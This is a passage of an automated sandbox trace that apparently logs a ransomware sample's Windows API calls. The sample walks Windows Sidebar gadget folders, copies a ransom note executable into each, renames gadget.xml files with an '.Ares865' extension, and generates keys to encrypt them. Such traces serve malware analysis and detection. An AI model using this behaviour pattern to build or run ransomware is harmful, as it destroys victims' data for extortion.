Sidebar\\Gadgets\\CPU.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" [0062.097] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" [0062.097] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.097] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.104] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5685f520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5685f520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.104] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.104] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.104] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" [0062.105] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" [0062.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5685f520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5685f520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.109] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.109] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.109] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865") returned 76 [0062.109] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0062.111] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.111] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=993) returned 1 [0062.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0062.111] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0062.112] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.112] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.112] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x118 [0062.114] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0062.115] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0062.116] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.116] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.117] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js" [0062.117] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js" [0062.117] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.117] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.121] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.121] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56885680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56885680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.121] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.121] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.121] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" [0062.121] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" [0062.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.126] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.126] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56885680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56885680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.126] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget" [0062.126] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget" [0062.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.132] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56885680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56885680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.132] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.132] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" [0062.132] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" [0062.132] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.132] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.139] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x568ab7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568ab7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.142] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" [0062.142] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" [0062.142] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.142] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.148] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x568ab7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568ab7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.148] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865") returned 78 [0062.148] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0062.148] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.149] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1003) returned 1 [0062.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0062.149] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0062.150] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.150] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.150] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x118 [0062.152] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0062.153] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0062.154] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.154] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.154] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js" [0062.154] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js" [0062.154] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.154] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.158] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x568d1940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568d1940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.158] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.158] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.158] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" [0062.158] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" [0062.158] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.159] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.162] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x568d1940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568d1940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.163] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.163] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.163] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget" [0062.163] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget" [0062.163] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.163] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.168] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x568f7aa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568f7aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.168] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.168] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.168] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" [0062.168] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" [0062.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 